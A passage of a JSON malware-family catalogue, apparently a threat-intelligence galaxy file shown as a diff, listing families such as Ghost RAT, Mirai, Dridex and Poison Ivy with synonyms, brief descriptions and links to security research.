"https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" - ] - } - }, - { - 
"uuid": "aea21616-061d-4177-9512-8887853394ed", - "value": "StegoLoader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" - ] - } - }, - { - "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", - "value": "FlawedAmmyy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/Coldzer0/Ammyy-v3", - "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" - ] - } - }, - { - "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", - "value": "Rikamanu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - } - }, - { - "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", - "value": "Ghost RAT", - "description": "", - "meta": { - "synonyms": [ - "PCRat", - "Gh0st RAT" - ], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", - "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", - "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://www.malware-traffic-analysis.net/2018/01/04/index.html", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", - "https://blog.cylance.com/the-ghost-dragon" - ] - } - }, - { - "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", - "value": "Unidentified 039", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", - "value": "CabArt", - 
"description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", - "value": "Pkybot", - "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.", - "meta": { - "synonyms": [ - "Pykbot", - "TBag", - "Bublik" - ], - "type": [], - "refs": [ - "http://blog.kleissner.org/?p=788", - "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", - "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" - ] - } - }, - { - "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", - "value": "Kitmos", - "description": "", - "meta": { - "synonyms": [ - "KitM" - ], - "type": [], - "refs": [ - "https://www.f-secure.com/weblog/archives/00002558.html" - ] - } - }, - { - "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", - "value": "Dimnie", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" - ] - } - }, - { - "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", - "value": "RatabankaPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trex.re.kr/3", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" - ] - } - }, - { - "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", - "value": "Rex", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/", - "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/" - ] - } - }, - { - "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", - "value": "BlackShades", - "description": "", - 
"meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", - "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/" - ] - } - }, - { - "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", - "value": "MyKings Spreader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] - } - }, - { - "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", - "value": "Rapid Ransom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malwrhunterteam/status/997748495888076800", - "https://twitter.com/malwrhunterteam/status/977275481765613569" - ] - } - }, - { - "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", - "value": "Mirai", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", - "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", - "https://twitter.com/PhysicalDrive0/status/830070569202749440" - ] - } - }, - { - "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", - "value": "SyncCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" - ] - } - }, - { - "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", - "value": "WebC2-Ausov", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", - "value": "WebC2-Cson", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", - "value": "Gazer", - "description": "", - "meta": { - "synonyms": [ - "WhiteBear" - ], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", - "https://securelist.com/introducing-whitebear/81638/", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://github.com/eset/malware-ioc/tree/master/turla" - ] - } - }, - { - "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", - "value": "r2r2", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" - ] - } - }, - { - "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", - "value": "Ztorg", - "description": "", - "meta": { - "synonyms": [ - "Qysly" - ], - "type": [], - "refs": [ - "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", - "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", - "https://securelist.com/ztorg-from-rooting-to-sms/78775/" - ] - } - }, - { - "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", - "value": "Bashlite", - "description": "", - "meta": { - "synonyms": [ - "lizkebab", - "qbot", - "torlus", - "Gafgyt", - "gayfgt" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - 
"https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/" - ] - } - }, - { - "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", - "value": "smac", - "description": "", - "meta": { - "synonyms": [ - "speccom" - ], - "type": [], - "refs": [ - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" - ] - } - }, - { - "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", - "value": "Delta(Alfa,Bravo, ...)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" - ] - } - }, - { - "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", - "value": "Biscuit", - "description": "", - "meta": { - "synonyms": [ - "zxdosml" - ], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", - "value": "Unidentified 024 (Ransomware)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malwrhunterteam/status/789161704106127360" - ] - } - }, - { - "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", - "value": "Venus Locker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/813690129088937984" - ] - } - }, - { - "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", - "value": "JQJSNICKER", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://marcmaiffret.com/vault7/" - ] - } - }, - { - "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", - "value": "APT3 Keylogger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/", - 
"https://twitter.com/smoothimpact/status/773631684038107136", - "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" - ] - } - }, - { - "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", - "value": "Charger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.checkpoint.com/2017/01/24/charger-malware/", - "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" - ] - } - }, - { - "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", - "value": "Unidentified APK 001", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/illegalFawn/status/826775250583035904" - ] - } - }, - { - "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", - "value": "Polyglot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" - ] - } - }, - { - "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", - "value": "Ebury", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", - "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", - "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", - "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", - "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf" - ] - } - }, - { - "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", - "value": "DeputyDog", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" - ] - } - }, - { - "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", - "value": "EHDevel", - "description": "", - "meta": { - "synonyms": [], - "type": [], 
- "refs": [ - "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" - ] - } - }, - { - "uuid": "c359c74e-4155-4e66-a344-b56947f75119", - "value": "RCS", - "description": "", - "meta": { - "synonyms": [ - "Remote Control System", - "Crisis" - ], - "type": [], - "refs": [ - "https://www.f-secure.com/documents/996508/1030745/callisto-group", - "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" - ] - } - }, - { - "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", - "value": "CryptoShuffler", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" - ] - } - }, - { - "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", - "value": "Red Alert", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/816237293073797121" - ] - } - }, - { - "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", - "value": "Opachki", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://forum.malekal.com/viewtopic.php?t=21806", - "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", - "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", - "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html" - ] - } - }, - { - "uuid": "495377c4-1be5-4c65-ba66-94c221061415", - "value": "Corebot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", - "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" - ] - } - }, - { - "uuid": 
"a8e7687b-9db7-4606-ba81-320d36099e3a", - "value": "systemd", - "description": "General purpose backdoor", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" - ] - } - }, - { - "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", - "value": "Slempo", - "description": "", - "meta": { - "synonyms": [ - "SlemBunk" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html", - "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html" - ] - } - }, - { - "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", - "value": "DownPaper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/charmingkitten/" - ] - } - }, - { - "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", - "value": "MobiRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" - ] - } - }, - { - "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", - "value": "Hajime", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "https://x86.re/blog/hajime-a-follow-up/", - "http://blog.netlab.360.com/hajime-status-report-en/", - "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", - "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", - "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", - "https://github.com/Psychotropos/hajime_hashes" - ] - } - }, - { - "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", - "value": "DarkShell", - "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. 
During 2011, DarkShell was reported to target the industrial food processing industry.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" - ] - } - }, - { - "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", - "value": "murkytop", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - } - }, - { - "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", - "value": "KevDroid", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/", - "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" - ] - } - }, - { - "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", - "value": "Powmet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" - ] - } - }, - { - "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", - "value": "Luzo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", - "value": "MILKMAID", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", - "value": "Dridex", - "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. 
These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. 
Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", - "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", - "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", - "https://viql.github.io/dridex/", - "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] - } - }, - { - "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", - "value": "NewsReels", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "88d70171-fc89-44d1-8931-035c0b095247", - "value": "Unidentified 041", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "542161c0-47a4-4297-baca-5ed98386d228", - "value": "Ramnit", - "description": "", - "meta": { - "synonyms": [ - "Nimnul" - ], - "type": [], - "refs": [ - "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", - "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", - "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", - "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", - "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", - 
"https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf" - ] - } - }, - { - "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", - "value": "Zyklon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html" - ] - } - }, - { - "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", - "value": "Gratem", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] - } - }, - { - "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", - "value": "GoldDragon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] - } - }, - { - "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", - "value": "Fake Pornhub", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", - "value": "Herbst", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" - ] - } - }, - { - "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", - "value": "TeleBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] - } - }, - { - "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", - "value": "XOR DDoS", - "description": "Linux DDoS C&C Malware", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", - 
"https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", - "https://en.wikipedia.org/wiki/Xor_DDoS" - ] - } - }, - { - "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", - "value": "HtBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", - "value": "Coinminer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/", - "https://secrary.com/ReversingMalware/CoinMiner/" - ] - } - }, - { - "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", - "value": "Apocalypse", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" - ] - } - }, - { - "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", - "value": "Kwampirs", - "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. 
Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" - ] - } - }, - { - "uuid": "59c161f4-bb09-4590-9eec-e4d5db3ecb2e", - "value": "win.remy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", - "value": "Downeks", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" - ] - } - }, - { - "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", - "value": "KoobFace", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", - "value": "Tarsip", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", - "value": "Lyposit", - "description": "", - "meta": { - "synonyms": [ - "Lucky Locker", - "Adneukine", - "Bomba Locker" - ], - "type": [], - "refs": [ - "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", - "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", - "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" - ] - } - }, - { - "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", - "value": "Poison Ivy", - "description": "", - "meta": { - "synonyms": [ - "pivy", - "poisonivy" - ], - "type": [], - "refs": [ - 
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", - "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", - "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", - "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", - "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", - "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", - "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", - "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - } - }, - { - "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", - "value": "SAGE", - "description": "", - "meta": { - "synonyms": [ - "Saga" - ], - "type": [], - "refs": [ - "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", - "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", - "http://malware-traffic-analysis.net/2017/10/13/index.html", - "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/" - ] - } - }, - { - "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", - "value": "Remsec", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" - ] - } - }, - { - "uuid": "a0881a0c-e677-495b-b475-290af09bb716", - "value": "Alma Communicator", - "description": "", - "meta": { - "synonyms": [], - "type": [], - 
"refs": [ - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" - ] - } - }, - { - "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", - "value": "OnlinerSpambot", - "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.", - "meta": { - "synonyms": [ - "SBot", - "Onliner" - ], - "type": [], - "refs": [ - "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" - ] - } - }, - { - "uuid": "f64683c8-50ab-42c0-8b90-881598906528", - "value": "Shakti", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" - ] - } - }, - { - "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", - "value": "TabMsgSQL", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", - "value": "Hermes", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" - ] - } - }, - { - "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", - "value": "CherryPicker POS", - "description": "", - "meta": { - "synonyms": [ - "cherrypicker", - "cherrypickerpos", - "cherry_picker" - ], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" - ] - } - }, - { - "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", - "value": "Ranscam", - "description": "", - "meta": { - "synonyms": [], - 
